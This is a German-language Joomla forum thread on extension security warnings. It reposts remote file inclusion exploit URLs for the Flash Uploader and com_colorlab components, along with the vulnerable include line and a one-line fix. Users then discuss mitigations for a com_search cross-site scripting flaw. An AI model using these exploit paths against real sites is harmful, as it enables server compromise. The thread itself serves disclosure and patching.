Thema: Exploits: Sicherheitswarnungen über Erweiterungen

Joomla Flash Uploader

Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2

= http://download.joomlaportal.ch/content/view/1060/
=
============================================
=
= Exploit:
= administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolu te_path=shell?
= administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_abso lute_path=shell?

Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/components/com_colorlab/admin.color.php?mosConfig_live_site=shell?
--------------------
Behebung des Problems:

1-öffne admin.colo.php
2-folgende Zeile einfügen

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

Zitat von rickkp

Behebung des Problems:

Nee, Behebung des Problems: Den Schrott löschen!

Wenn schon solche elementaren Fehler drin sind, die seit Urzeiten bekannt und sind und kommuniziert werden (wie unsicher wird dann der Rest sein?), kann man den Autor bei gehackten Seiten ohne Gewissensbisse auf Schadensersatz verklagen.

Joomla 1.0.13 Komponente com_search verwundbar gegen Cross-Site Scripting

Das Problem ist bekannt und es wird daran gearbeitet.

Ob Versionen vor 1.0.13 betroffen sind, ist nicht bekannt.

www.joomla.org

www.securityfocus.com

Holla, das isch schlecht. :( :(
Sofort abschalten? Nur noch für registrierte machen ojojoje

Nun ja alle suchfunktionen nur noch für angemeldete Benutzer gemacht bei allen Such Mambots und menülink zur kommponente erstellt und auch nur für angemeldete. Villeicht hilfts.
Was denkt Ihr, eine denny from all htaccess anlegen in com_search?

TagClouds arbeitet mit der Suchfunktion zusammen, hoffentlich kommt bald ein patch raus.... Ich kucke aber mal selber.....

serarch.php zeigt doch da was htmlspecialchars. Giebst da ned noch was besseres.....

Code:

    $searchword_clean = htmlspecialchars( $searchword );

        search_html::searchintro( $searchword_clean, $params );

Ausserdem was mich ein wenig verwirrt:

Code:

} else if ( in_array( $searchword, $search_ignore ) ) {
        // html output
        search_html::message( _IGNOREKEYWORD, $params );
    } else {
        // html output

Wo kann man den die Stopwörter festlegen, ich wüsste ned wo.

Es gibt einen Eintrag im Tracker

http://joomlacode.org/gf/project/joo...r_item_id=7608

In der SVN ist noch nichts aktuelles.

@rickkp
Ok filter /includes/phpInputFilter/class.inputfilter.php
Zeile 365.

Code:

if ((!eregi("^[a-z]*$", $attrSubSet[0])) || (($this->xssAuto)
&& ((in_array(strtolower($attrSubSet[0]), $this->attrBlacklist)) ||
(substr(strtolower($attrSubSet[0]), 0, 2) == 'on'))))

meinst Du das ist es nu?

Keine Ahnung - der Beitrag im Tracker ist nicht confirmed!

Rob von joomla.org hat mir noch nicht geantwortet - wird noch in der Falle liegen, ist ja erst 8 Uhr in USA

Ja klar, mache ich..
Sorry für die Umstände
hehehe na is ja auch sonntag

Hey, danke stimmt, im ignore liegts
ja klar, aber vielleicht kann mans ein bischen begrenzen damit,
Was meinst Du über die htacess zu regeln?